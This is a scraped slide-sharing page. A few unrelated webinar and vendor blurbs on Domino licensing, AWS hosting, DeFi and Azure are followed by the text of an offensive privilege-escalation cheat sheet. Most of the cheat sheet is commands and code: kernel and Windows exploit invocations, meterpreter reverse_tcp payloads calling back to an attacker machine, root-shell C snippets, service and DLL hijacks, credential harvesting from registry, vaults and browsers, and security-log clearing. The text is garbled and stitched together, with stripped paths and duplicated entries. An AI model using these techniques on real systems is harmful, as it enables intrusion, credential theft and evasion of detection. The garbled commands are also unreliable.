DLAU und die Lizenzen nach dem CCB- und CCX-Modell sind für viele in der HCL-Community seit letztem Jahr ein heißes Thema. Als Notes- oder Domino-Kunde haben Sie vielleicht mit unerwartet hohen Benutzerzahlen und Lizenzgebühren zu kämpfen. Sie fragen sich vielleicht, wie diese neue Art der Lizenzierung funktioniert und welchen Nutzen sie Ihnen bringt. Vor allem wollen Sie sicherlich Ihr Budget einhalten und Kosten sparen, wo immer möglich. Das verstehen wir und wir möchten Ihnen dabei helfen!
Wir erklären Ihnen, wie Sie häufige Konfigurationsprobleme lösen können, die dazu führen können, dass mehr Benutzer gezählt werden als nötig, und wie Sie überflüssige oder ungenutzte Konten identifizieren und entfernen können, um Geld zu sparen. Es gibt auch einige Ansätze, die zu unnötigen Ausgaben führen können, z. B. wenn ein Personendokument anstelle eines Mail-Ins für geteilte Mailboxen verwendet wird. Wir zeigen Ihnen solche Fälle und deren Lösungen. Und natürlich erklären wir Ihnen das neue Lizenzmodell.
Nehmen Sie an diesem Webinar teil, bei dem HCL-Ambassador Marc Thomas und Gastredner Franz Walder Ihnen diese neue Welt näherbringen. Es vermittelt Ihnen die Tools und das Know-how, um den Überblick zu bewahren. Sie werden in der Lage sein, Ihre Kosten durch eine optimierte Domino-Konfiguration zu reduzieren und auch in Zukunft gering zu halten.
Diese Themen werden behandelt
- Reduzierung der Lizenzkosten durch Auffinden und Beheben von Fehlkonfigurationen und überflüssigen Konten
- Wie funktionieren CCB- und CCX-Lizenzen wirklich?
- Verstehen des DLAU-Tools und wie man es am besten nutzt
- Tipps für häufige Problembereiche, wie z. B. Team-Postfächer, Funktions-/Testbenutzer usw.
- Praxisbeispiele und Best Practices zum sofortigen Umsetzen
Have you ever been confused by the myriad of choices offered by AWS for hosting a website or an API?
Lambda, Elastic Beanstalk, Lightsail, Amplify, S3 (and more!) can each host websites + APIs. But which one should we choose?
Which one is cheapest? Which one is fastest? Which one will scale to meet our needs?
Join me in this session as we dive into each AWS hosting service to determine which one is best for your scenario and explain why!
A Comprehensive Guide to DeFi Development Services in 2024Intelisync
DeFi represents a paradigm shift in the financial industry. Instead of relying on traditional, centralized institutions like banks, DeFi leverages blockchain technology to create a decentralized network of financial services. This means that financial transactions can occur directly between parties, without intermediaries, using smart contracts on platforms like Ethereum.
In 2024, we are witnessing an explosion of new DeFi projects and protocols, each pushing the boundaries of what’s possible in finance.
In summary, DeFi in 2024 is not just a trend; it’s a revolution that democratizes finance, enhances security and transparency, and fosters continuous innovation. As we proceed through this presentation, we'll explore the various components and services of DeFi in detail, shedding light on how they are transforming the financial landscape.
At Intelisync, we specialize in providing comprehensive DeFi development services tailored to meet the unique needs of our clients. From smart contract development to dApp creation and security audits, we ensure that your DeFi project is built with innovation, security, and scalability in mind. Trust Intelisync to guide you through the intricate landscape of decentralized finance and unlock the full potential of blockchain technology.
Ready to take your DeFi project to the next level? Partner with Intelisync for expert DeFi development services today!
Azure API Management to expose backend services securely
74 Methods for Privilege Escalation Part 2
1. 74 METHODS FOR PRIVILEGE
ESCALATION
PART 2
HADESS | SECURE AGILE DEVELOPMENT
WWW.HADESS.IO
2. NO
Y/N
Yes
NO
NO
NO
Y/N
Y/N
N
N
N
YES
YES
YES
Y/N
YES
YES
YES
NO
NO
Y/N
NO
Y/N
YES
No
PART 1 SUMMARY
HADESS | SECURE AGILE DEVELOPMENT
Method DOMAIN APT
1 Abusing Sudo Binaries
2 Abusing Scheduled Tasks
3 Golden Ticket With
Scheduled Tasks
4 Abusing Interpreter
Capabilities
5 Abusing Binary Capabilities
6 Abusing ActiveSessions
Capabilities
7
Escalate with TRUSTWORTHY
in SQL Server
8 Abusing Mysql
run as root
No Method DOMAIN APT
9 Abusing
journalctl
10 Abusing VDS
11 Abusing Browser
12 Abusing LDAP
13 LLMNR Poisoning
14 Abusing Certificate
Services
15 MySQL UDF Code
Injection
16 Impersonation Token with
ImpersonateLoggedOnuser
No Method DOMAIN APT
17 Impersonation Token with
SeImpersontePrivilege
18
Impersonation Token with
SeLoadDriverPrivilege
19 OpenVPN
Credentials
20 Bash History
21 Package Capture
22 NFS Root Squashing
23 Abusing Access
Control List
24 Escalate With
SeBackupPrivilege
3. No
PART 1 SUMMARY
HADESS | SECURE AGILE DEVELOPMENT
Method DOMAIN APT
25 Escalate With
SeImpersonatePrivilege
YES
26 Escalate With
SeLoadDriverPrivilege
YES
27 Escalate With
ForceChangePassword
YES
28 Escalate With
GenericWrite
YES
29 Abusing GPO YES
30 Pass-the-Ticket YES
31 Golden Ticket YES
32 Abusing Splunk
Universal Forwarder
NO
No Method DOMAIN APT
33 Abusing Gdbus Y/N
34 Abusing Trusted DC YES
35 NTLM Relay YES
36 Exchange Relay YES
37 Dumping with
diskshadow
YES
38 Dumping with
vssadmin
YES
39 Password Spraying
Y/N
40 AS-REP Roasting YES
5. Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
gcc -pthread c0w.c -o c0w; ./c0w; passwd; id
DIRTYC0W
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
6. Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
CVE-2016-1531.sh;id
CVE-2016-1531
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
7. Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-
Esclation
poc.sh
POLKIT
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
8. Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
./traitor-amd64 --exploit kernel:CVE-2022-0847
Whoami;id
DIRTYPIPE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
9. Domain: No
Local Admin: Yes
OS: Linux
Type: 0/1 Exploit
./cve-2021-4034
Whoami;id
PWNKIT
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
10. Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id
>
msf exploit(ms14_058_track_popup_menu) > exploit
MS14_058
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
11. Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
In command prompt type: powershell.exe -nop -ep bypass
In Power Shell prompt type: Import-Module
C:UsersUserDesktopToolsTaterTater.ps1
In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net
localgroup
administrators user /add"
To confirm that the attack was successful, in Power Shell prompt
type:
net localgroup administrators
HOT POTATO
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
12. Domain: No
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
execute -H -f sysret.exe -a "-pid [pid]”
INTEL SYSRET
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
13. Domain: Yes
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll
PRINTNIGHTMARE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
14. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
https://github.com/JohnHammond/msdt-follina
python3 follina.py -c "notepad"
FOLINA
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
15. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
https://github.com/riparino/Task_Scheduler_ALPC
ALPC
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
16. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
sudo ntlmrelayx.py -t ldap://10.0.0.10 --no-wcf-server --escalate-user
normal_user
.RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
REMOTEPOTATO0
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
17. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
certipy req 'lab.local/cve$:CVEPassword1234*@10.100.10.13' -template
Machine -dc-ip 10.10.10.10 -ca lab-ADCS-CA
Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx
/password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN"
/dc:"DOMAIN_CONTROLLER" /show
CVE-2022-26923
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
18. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: 0/1 Exploit
python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-
771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
MS14-068
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
19. Domain: No
Local Admin: Yes
OS: Linux
Type: Enumeration & Hunt
ps -ef | grep ftp;
gdp -p ftp_id
info proc mappings
q
dump memory /tmp/mem [start] [end]
q
strings /tmp/mem | grep passw
PASSWORD MINING IN MEMORY(LINUX)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
20. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
In Metasploit (msf > prompt) type: use
auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run
In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
column
and select “Create Dump File” from the popup menu.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
Select the Copy the Base64 encoded string.
In command prompt type: echo -ne [Base64 String] | base64 -d
1
2.
3.
PASSWORD MINING IN MEMORY(WINDOWS)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
21. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Open command and type:
reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v
DefaultUsername
In command prompt type:
reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v
DefaultPassword
Notice the credentials, from the output.
In command prompt type:
reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42
-v ProxyUsername
In command prompt type:
reg query HKEY_CURRENT_USERSoftwareSimonTathamPuTTYSessionsBWP123F42
-v ProxyPassword
In command prompt type:
reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v Password
In command prompt type:
reg query HKEY_CURRENT_USERSoftwareTightVNCServer /v PasswordViewOnly
Make note of the encrypted passwords and type:
C:UsersUserDesktopToolsvncpwdvncpwd.exe [Encrypted Password]
From the output, make note of the credentials.
1.
2.
3.
4.
5.
6. Notice the credentials, from the output.
7.
8.
9.
10.
PASSWORD MINING IN REGISTRY
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
22. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics
flog -s 10s -n 200
invoke-module LogCleaner.ps1
Or
PASSWORD MINING IN GENERAL EVENTS VIA SEAUDIT
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
23. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics
flog -s 10s -n 200
wevtutil cl Security
Or
PASSWORD MINING IN SECURITY EVENTS VIA SESECURITY
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
24. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open another command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP
Address] -f exe -o
x.exe
Place x.exe in “C:ProgramDataMicrosoftWindowsStart
MenuProgramsStartup”.
1.
2.
STARTUP APPLICATIONS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
25. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpUp.exe McAfeeSitelistFiles
PASSWORD MINING IN MCAFEESITELISTFILES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
26. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpUp.exe CachedGPPPassword
PASSWORD MINING IN CACHEDGPPPASSWORD
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
27. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpUp.exe DomainGPPPassword
PASSWORD MINING IN DOMAINGPPPASSWORD
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
28. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe keepass
KeeTheft.exe
Or
PASSWORD MINING IN KEEPASS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
29. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe WindowsVault
PASSWORD MINING IN WINDOWSVAULT
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
30. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe SecPackageCreds
PASSWORD MINING IN SECPACKAGECREDS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
31. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe PuttyHostKeys
PASSWORD MINING IN PUTTYHOSTKEYS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
32. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe RDCManFiles
PASSWORD MINING IN RDCMANFILES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
33. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
Seatbelt.exe RDPSavedConnections
PASSWORD MINING IN RDPSAVEDCONNECTIONS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
34. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpDPAPI masterkeys
PASSWORD MINING IN MASTERKEYS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
35. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpWeb.exe all
PASSWORD MINING IN BROWSERS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
36. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SauronEye.exe -d C:UsersvincentDesktop --filetypes .txt .doc .docx
.xls --contents --keywords password pass* -v`
PASSWORD MINING IN FILES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
37. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
SharpLDAPSearch.exe "(&(objectClass=user)(cn=*svc*))"
"samaccountname"
Import-Module .PowerView.ps1
Get-DomainComputer COMPUTER -Properties ms-mcs-
AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime
Or
PASSWORD MINING IN LDAP
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
38. Domain: No
Local Admin: Yes
OS: Windows
Type: Enumeration & Hunt
execute-assembly /root/SharpClipHistory.exe
PASSWORD MINING IN CLIPBOARD
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
39. Domain: No
Local Admin: Yes
OS: Windows
Type: Delegate tokens
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
PASSWORD MINING IN GMSA PASSWORD
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
40. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Delegate tokens
./fake_rdp.py
pyrdp-mitm.py 192.168.1.10 -k private_key.pem -c certificate.pem
Or
DELEGATE TOKENS VIA RDP
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
41. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Delegate tokens
FakeFtpServer fakeFtpServer = new FakeFtpServer();
fakeFtpServer.addUserAccount(new UserAccount("user", "password",
"c:data"));
FileSystem fileSystem = new WindowsFakeFileSystem();
fileSystem.add(new DirectoryEntry("c:data"));
fileSystem.add(new FileEntry("c:datafile1.txt", "abcdef
1234567890"));
fileSystem.add(new FileEntry("c:datarun.exe"));
fakeFtpServer.setFileSystem(fileSystem);
fakeFtpServer.start();
DELEGATE TOKENS VIA FTP
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
42. Domain: No
Local Admin: Yes
OS: Windows
Type: Phish
execute-assembly fakelogonscreen.exe
FAKE LOGON SCREEN
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
43. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Service
RogueWinRM.exe -p C:windowssystem32cmd.exe
ABUSING WINRM SERVICES
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
44. Domain: Yes
Local Admin: Yes
OS: Windows
Type: Abuse Certificate
ceritify.exe request /ca:dc.domain.localDC-CA /template:User…
Rubeus.exe asktgy /user:CORPitadmin /certificate:C:cert.pfx
/password:password
CERTIFICATE ABUSE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
45. Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
gcc -fPIC -shared -o /tmp/ldreload.so ldreload.c -nostartfiles
sudo LD_RELOAD=tmp/ldreload.so apache2
id
1.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
2.
3.
4.
SUDO LD_PRELOAD
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
46. Domain: No
Local Admin: Yes
OS: Linux
Type: Injection
Mkdir /home/user/.config
gcc -shared -o /home/user/.config/libcalc.so -
fPIC/home/user/.config/libcalc.c
/usr/local/bin/suid-so
id
1.
2.
#include <stdio.h>
#include <stdlib.h>
static void inject() _attribute _((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash
-p");
}
3.
4.
5.
ABUSING FILE PERMISSION VIA SUID BINARIES - (.SO INJECTION)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
47. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Injection
1.
RemoteDLLInjector64
Or
MemJect
Or
https://github.com/tomcarver16/BOF-DLL-Inject
2.
#define PROCESS_NAME "csgo.exe"
Or
RemoteDLLInjector64.exe pid C:runforpriv.dll
Or
mandllinjection ./runforpriv.dll pid
DLL INJECTION
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
48. Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
hollow svchost.exe pop.bin
EARLY BIRD INJECTION
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
49. Domain: No
Local Admin: Yes
OS: Windows
Type: Injection
sec-shinject PID /path/to/bin
PROCESS INJECTION THROUGH MEMORY SECTION
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
50. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >
systemupdate.sh;
chmod +x systemupdate.sh
Wait a while
/tmp/bash -p
id && whoami
ABUSING SCHEDULED TASKS VIA CRON PATH OVERWRITE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
51. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing Scheduled Tasks
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >
/home/user/systemupdate.sh;
touch /home/user/ --checkpoint=1;
touch /home/user/ --checkpoint-action=exec=shsystemupdate.sh
Wait a while
/tmp/bash -p
id && whoami
ABUSING SCHEDULED TASKS VIA CRON WILDCARDS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
52. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
su - www-data;
nginxed-root.sh /var/log/nginx/error.log;
In root user
invoke-rc.d nginx rotate >/dev/null 2>&1
1.
2.
3.
ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
53. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
su - www-data;
nginxed-root.sh /var/log/nginx/error.log;
In root user
invoke-rc.d nginx rotate >/dev/null 2>&1
1.
2.
3.
ABUSING FILE PERMISSION VIA SUID BINARIES - SYMLINK)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
54. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
1.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }'
>/tmp/service.c;
2.
gcc /tmp/services.c -o /tmp/service;
3.
export PATH=/tmp:$PATH;
4.
/usr/local/bin/sudi-env; id
ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #1)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
55. Domain: No
Local Admin: Yes
OS: Linux
Type: Abusing File Permission
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown
root.root /tmp/bash && chmod +S /tmp/bash)' /bin/sh -c
/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
ABUSING FILE PERMISSION VIA SUID BINARIES - ENVIRONMENT VARIABLES #2)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
56. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Windows_dll.c:
cmd.exe /k net localgroup administrators user /add
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
sc stop dllsvc & sc start dllsvc
1.
2.
3.
DLL HIJACKING
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
57. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
sc config daclsvc binpath= "net localgroup administrators user /add"
sc start daclsvc
1.
2.
ABUSING SERVICES VIA BINPATH
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
58. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
msfvenom -p windows/exec CMD='net localgroup administrators user
/add' -f exe-service -o common.exe
Place common.exe in ‘C:Program FilesUnquoted Path Service’.
sc start unquotedsvc
1.
2.
3.
ABUSING SERVICES VIA UNQUOTED PATH
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
59. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
reg add HKLMSYSTEMCurrentControlSetservicesregsvc /v
ImagePath /t REG_EXPAND_SZ /d c:tempx.exe /f
sc start regsvc
1.
2.
ABUSING SERVICES VIA REGISTRY
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
60. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
copy /y c:Tempx.exe "c:Program FilesFile Permissions
Servicefilepermservice.exe"
sc start filepermsvc
1.
2.
ABUSING SERVICES VIA EXECUTABLE FILE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
61. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1.
In Metasploit (msf > prompt) type: use multi/handler
In Metasploit (msf > prompt) type: set payload
windows/meterpreter/reverse_tcp
In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
In Metasploit (msf > prompt) type: run
Open an additional command prompt and type:
msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP
Address] -f exe -o
program.exe
2.
Place program.exe in ‘C:Program FilesAutorun Program’.
ABUSING SERVICES VIA AUTORUN
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
62. Domain: No
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1.
msfvenom -p windows/exec CMD='net localgroup
administrators user /add' -f msi-nouac -o setup.msi
2.
msiexec /quiet /qn /i C:Tempsetup.msi
Or
SharpUp.exe AlwaysInstallElevated
ABUSING SERVICES VIA ALWAYSINSTALLELEVATED
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
63. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1.
.load C:devPrivEditorx64ReleasePrivEditor.dll
2.
!rmpriv
ABUSING SERVICES VIA SECREATETOKEN
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
64. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1.
Conjure-LSASS
Or
syscall_enable_priv 20
ABUSING SERVICES VIA SEDEBUG
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
65. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
injectEtwBypass pid
REMOTE PROCESS VIA SYSCALLS (HELLSGATE|HALOSGATE)
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
66. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
PrimaryTokenTheft.exe pid
TokenPlaye.exe --impersonate --pid pid
Or
ESCALATE WITH DUPLICATETOKENEX
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
67. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
start /realtime SomeCpuIntensiveApp.exe
ABUSING SERVICES VIA SEINCREASEBASEPRIORITY
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
68. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
Just only compile and run SeManageVolumeAbuse
ABUSING SERVICES VIA SEMANAGEVOLUME
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
69. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
WRITE_OWNER access to a resource, including files and folders.
Run for privilege escalation
1.
2.
ABUSING SERVICES VIA SERELABEL
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
70. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. Launch PowerShell/ISE with the SeRestore privilege present.
2. Enable the privilege with Enable-SeRestorePrivilege).
3. Rename utilman.exe to utilman.old
4. Rename cmd.exe to utilman.exe
5. Lock the console and press Win+U
ABUSING SERVICES VIA SERESTORE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
71. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1.
In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
In Metasploit (msf > prompt) type: set uripath x
In Metasploit (msf > prompt) type: run
2.
In taskmgr and right-click on the “iexplore.exe” in the “Image Name”
column
and select “Create Dump File” from the popup menu.
3.
strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
Select the Copy the Base64 encoded string.
In command prompt type: echo -ne [Base64 String] | base64 -d
ABUSE VIA SEBACKUP
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
72. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
HIBR2BIN /PLATFORM X64 /MAJOR 6 /MINOR 1 /INPUT hiberfil.sys
/OUTPUT uncompressed.bin
ABUSING VIA SECREATEPAGEFILE
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
73. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
.load C:devPrivEditorx64ReleasePrivEditor.dll
TrustExec.exe -m exec -c "whoami /priv" -f
1.
2.
ABUSING VIA SESYSTEMENVIRONMENT
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
74. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
1. takeown.exe /f "%windir%system32"
2. icalcs.exe "%windir%system32" /grant "%username%":F
3. Rename cmd.exe to utilman.exe
4. Lock the console and press Win+U
ABUSING VIA SETAKEOWNERSHIP
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
75. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
PSBits
PrivFu
psexec.exe -i -s -d cmd.exe
1.
Or
2.
ABUSING VIA SETCB
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
76. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
.load C:devPrivEditorx64ReleasePrivEditor.dll
CredManBOF
TrustExec.exe -m exec -c "whoami /priv" -f
1.
Or
2.
ABUSING VIA SETRUSTEDCREDMANACCESS
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
77. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
JuicyPotato.exe
Or
https://github.com/decoder-it/juicy_2
https://github.com/antonioCoco/RoguePotato
ABUSING TOKENS VIA SEASSIGNPRIMARYTOKEN
HADESS | SECURE AGILE DEVELOPMENT
Difficulty
APT
Used
Detection
78. Domain: Y/N
Local Admin: Yes
OS: Windows
Type: Abuse Privilege
./WELA.ps1 -LogFile .Security.evtx -EventIDStatistics
flog -s 10s -n 200
invoke-module LogCleaner.ps1
1.
2.
Or
ABUSING VIA SECREATEPAGEFILE
